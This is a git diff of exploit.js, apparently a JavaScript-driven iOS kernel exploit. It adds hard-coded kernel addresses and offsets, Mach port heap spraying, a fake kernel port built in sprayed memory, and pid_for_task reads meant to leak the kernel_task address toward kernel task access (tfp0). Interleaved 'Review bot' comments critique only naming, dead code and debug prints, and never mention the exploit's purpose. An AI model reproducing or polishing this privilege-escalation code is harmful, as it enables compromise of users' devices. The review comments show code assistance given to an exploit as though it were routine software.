Diffstat (limited to 'src/js/kexp')
| -rwxr-xr-x | src/js/kexp/exploit.js | 141 |
1 files changed, 138 insertions, 3 deletions
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js index 715535d..8447c46 100755 --- a/src/js/kexp/exploit.js +++ b/src/js/kexp/exploit.js @@ -30,6 +30,16 @@ var req_init_port_set_address = 0x0; var req_init_port_set_count = 0x4; var MACH_RCV_MSG = 0x2; var MACH_MSG_TIMEOUT_NONE = 0; +var TASK_BSDINFO_OFFSET = 0x200; +var BSDINFO_PID_OFFSET = 0x8; + +function find_kerneltask() { + return 0x8041200c; +} + +function find_ipcspacekernel() { + return 0x80456664; +} var task_self = 0; var kslide = 0; @@ -58,7 +68,6 @@ var SIZEOF_BYTES_MSG = 384; var PORTS_NUM = 1024; var PORTS_NUM_PRESPRAY = 100; var MIG_MAX = 0x1000; -var NDR_record = 0x36ebf00c; function spray_data(mem, size, num, portptr) { var err = shit_heap(4); @@ -272,6 +281,7 @@ function send_ports(target, payload, num, number_port_descs) { } function release_port_ptrs(port) { +// var req = shit_heap(0x1c + (5 * 0xc) + 0x8); var req = shit_heap(0x1c + (5 * 0xc) + 0x8); // printf("%s\n", hexdump(read_buf(req, 0x1c + (5 * 0xc) + 0x8), 8, 2, req, 8, "0")); var ret = mach_msg(req, MACH_RCV_MSG, 0, (0x1c + (5 * 0xc) + 0x8), port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL); 
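Review bot: `find_kerneltask()` and `find_ipcspacekernel()` in the first hunk are named like lookups but each just returns an unexplained literal, and nothing in the hunk records what the value is or which build it belongs to. A reader has no way to tell whether `0x8041200c` is meant to be adjusted, recomputed, or is simply a placeholder, and the same goes for the two new `*_OFFSET` constants above them. Either rename them to plain constants alongside `TASK_BSDINFO_OFFSET` or add a one-line header such as `// hard-coded for a single target build; see <where these came from>` with the provenance filled in. As written the `find_` prefix promises work the functions do not do.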
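Review bot: The third hunk adds `// var req = shit_heap(0x1c + (5 * 0xc) + 0x8);` directly above the identical live line in `release_port_ptrs`, so the commit introduces a commented-out duplicate with no explanatory value. It should be dropped; if the intent was to note that the size is the message header plus five descriptors plus trailer, say that instead, e.g. `// header (0x1c) + 5 descriptors (0xc each) + 8 trailer`. The rest of `release_port_ptrs` continues outside the hunk.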
@@ -286,6 +296,37 @@ function r3gister(task, init_port_set, real_count, fake_count) { var InP = mess; var OutP = mess; + /* + InP->msgh_body.msgh_descriptor_count = 1; + InP->init_port_set.address = (void*)(init_port_set); + InP->init_port_set.count = real_count; + InP->init_port_set.disposition = 19; + InP->init_port_set.deallocate = FALSE; + InP->init_port_set.type = MACH_MSG_OOL_PORTS_DESCRIPTOR; + InP->NDR = NDR_record; + InP->init_port_setCnt = fake_count; // was real_count + InP->Head.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE); + InP->Head.msgh_remote_port = task; + InP->Head.msgh_local_port = mig_get_local_port(); + InP->Head.msgh_id = 3403; + InP->msgh_body.msgh_descriptor_count 0x18 0x4 + InP->init_port_set.address 0x1c 0x4 + InP->init_port_set.count 0x20 0x4 + InP->init_port_set 0x1c + InP->NDR 0x28 0x8 + InP->init_port_setCnt 0x30 0x4 + InP->Head.msgh_bits 0x0 0x4 + InP->Head.msgh_remote_port 0x8 0x4 + InP->Head.msgh_local_port 0xc 0x4 + InP->Head.msgh_id 0x14 0x4 +0x00000003 +0x00000034 0x0000002c +0x00000024 +50 +78 +0x0 0x1057ec + */ + write_u32(InP + 0x18, 1); write_u32(InP + 0x1c, init_port_set); write_u32(InP + 0x20, real_count); 
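Review bot: The block added to `r3gister` is a ~30-line comment that pastes the original C struct assignments, a field/offset table and a run of loose hex values with no connective text, which is the kind of scratch material that belongs in a notes file rather than the function body. It also references `NDR_record`, the global that this same commit deletes in the `@@ -58` hunk, so the comment is already stale on arrival. If the offsets are worth keeping, reduce them to a short table next to the `write_u32(InP + …)` calls, one line per field in the form `// 0x18 msgh_descriptor_count`, and delete the trailing unlabeled numbers. `r3gister` starts and ends outside this hunk.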
@@ -305,10 +346,46 @@ function r3gister(task, init_port_set, real_count, fake_count) { return ret; } +function mach_ports_lookup_shit() { + printf("fuck\n"); + var arrz = shit_heap(4); + printf("fuck\n"); + write_u32(arrz, 0); + printf("fuck\n"); + var sz = shit_heap(4);; + printf("fuck\n"); + write_u32(sz, 3); + printf("fuck\n"); +// var mts = mach_task_self(); + printf("fuck\n"); + calls4arg("mach_ports_lookup", task_self, arrz, sz, 0); + printf("mpl success\n"); + + return read_u32(read_u32(arrz) + 8); +} + +var kernel_task_addr = 0; function get_kernel_task() { var ret = 0; var tfp0 = 0; + /* + printf("fuck\n"); + var arrz = shit_heap(4); + printf("fuck\n"); + write_u32(arrz, 0); + printf("fuck\n"); + var sz = shit_heap(4);; + printf("fuck\n"); + write_u32(sz, 3); + printf("fuck\n"); + var mts = mach_task_self(); + printf("fuck\n"); + mach_ports_lookup(mts, arrz, sz); + printf("mpl success\n"); + return; +*/ + sanity_port = shit_heap(4); task_self = mach_task_self(); @@ -351,6 +428,8 @@ function get_kernel_task() { prepare_ptr(big_buf, big_size, kptr, 256); prepare_ptr(small_buf, small_size, kptr, 32); +again: while (true) { + var dummy = shit_heap(4); for (var i = 0; i < PORTS_NUM_PRESPRAY; i++) { spray(big_buf, big_size, dummy); 
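Review bot: The new module-level `var kernel_task_addr = 0;` introduced in this hunk is shadowed by `var kernel_task_addr = shit_heap(4);` inside `get_kernel_task` in the `@@ -374` hunk, so the global is never written and is dead as far as the visible code shows; either drop the global or remove the inner `var` so the function assigns the outer one. `mach_ports_lookup_shit` also has a stray double semicolon on `var sz = shit_heap(4);;` and eight `printf("fuck\n")` trace lines, and the commented-out block pasted into `get_kernel_task` is a verbatim copy of that function's body and should be deleted rather than kept as a comment. The same trace-print problem recurs throughout the `@@ -374` hunk; consider a single `debug(msg)` helper gated by a flag so the traces can stay without drowning the logic.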
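Review bot: The `again:` label on the new `while (true) {` in `get_kernel_task` is not referenced by any `continue again` or `break again` in this hunk or the next, so the label is dead and only suggests a retry path that the visible code does not have. Either remove the label or document what is supposed to jump back to it, e.g. `// retried via 'continue again' when <condition>` with the condition filled in. The loop body and its closing brace run past this hunk into the `@@ -374` one, and `get_kernel_task` starts before it.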
@@ -374,13 +453,69 @@ function get_kernel_task() { var arrmpt = shit_heap(8); write_u32(arrmpt, 0); write_u32(arrmpt + 4, 0); + mach_ports_lookup_shit(); var ret__ = r3gister(mach_task_self(), arrmpt, 2, 3); - printf("%d %s", ret__, mach_error_string(ret__)); + mach_ports_lookup_shit(); + printf("%d %s\n", ret__, mach_error_string(ret__)); printf("r3gister done\n"); +// while (true) { + // +// } + scall("printf", "done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp)); + printf("fuck\n"); +// var fake_port = read_u32(read_u32(arrz) + 8); + + /* + * BEGIN JANK FUCKING HACK + */ + var fake_port = mach_ports_lookup_shit(); + printf("fuck\n"); + printf("%x\n", fake_port); + printf("fuck\n"); + // todo: add mach_port_valid stuff + printf("fuck\n"); + + printf("fuck\n"); + write_u32(kport + 0x50, kptr + 0x78 - TASK_BSDINFO_OFFSET); + printf("fuck\n"); + write_u32(ptr, find_kerneltask() + kslide - BSDINFO_PID_OFFSET); + printf("fuck\n"); + var tst_str = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\0"; + printf("fuck\n"); + var tst = _sptr(tst_str); + printf("fuck\n"); + var kpbuf = tst + 4; + printf("fuck\n"); - + printf("fuck\n"); + for (var i = 0; i < 2; i++) { + printf("fuck\n"); + write_buf(kpbuf + (i * 0x78), read_buf(kport + (i * 0x78), 0x78), 0x78); + } + printf("fuck\n"); + usleep(10000); + sched_yield(); + mach_port_destroy(mach_task_self(), read_u32(fakeportData)); + spray_data(tst, tst_str.length, 10, fakeportData); + printf("fuck\n"); + printf("done realloc"); + printf("fuck\n"); + + printf("fuck\n"); + var kernel_task_addr = shit_heap(4); + 
printf("fuck\n"); + scall("printf", "kernel_task address: 0x%08x\n", read_u32(kernel_task_addr)); + ret__ = pid_for_task(fake_port, kernel_task_addr); + printf("%d %s\n", ret__, mach_error_string(ret__)); + printf("fuck\n"); + printf("IF YOU SEE THIS AND IT LOOKS LEGIT, SHIT HAS FUCKING HAPPENED\n"); + printf("fuck\n"); + call4arg(sym_cache["puts"], sptr("kernel_task address: 0x" + pad_left(read_u32(kernel_task_addr).toString(16), '0', 8)), 0, 0, 0); + scall("printf", "kernel_task address: 0x%08x\n", read_u32(kernel_task_addr)); + printf("fuck\n"); printf("get lucky\n"); return tfp0; + } } |
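Review bot: `printf("done realloc");` in this hunk is the only new message without a trailing `\n`, so it will be glued to the next `printf("fuck\n")` line in the output; change it to `printf("done realloc\n");`. This hunk also calls `call4arg(sym_cache["puts"], …)` while the previous hunk's helper uses `calls4arg(…)`; if both names exist elsewhere in the file the mismatch is confusing enough to deserve a comment, and if only one does, one of the two calls is a typo that cannot be caught from here. The `// while (true) { … }` and `// var fake_port = …` commented-out remnants should be removed, and the two closing braces at the end belong to the `while (true)` opened in the `@@ -351` hunk and to `get_kernel_task`, whose start is outside this hunk.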
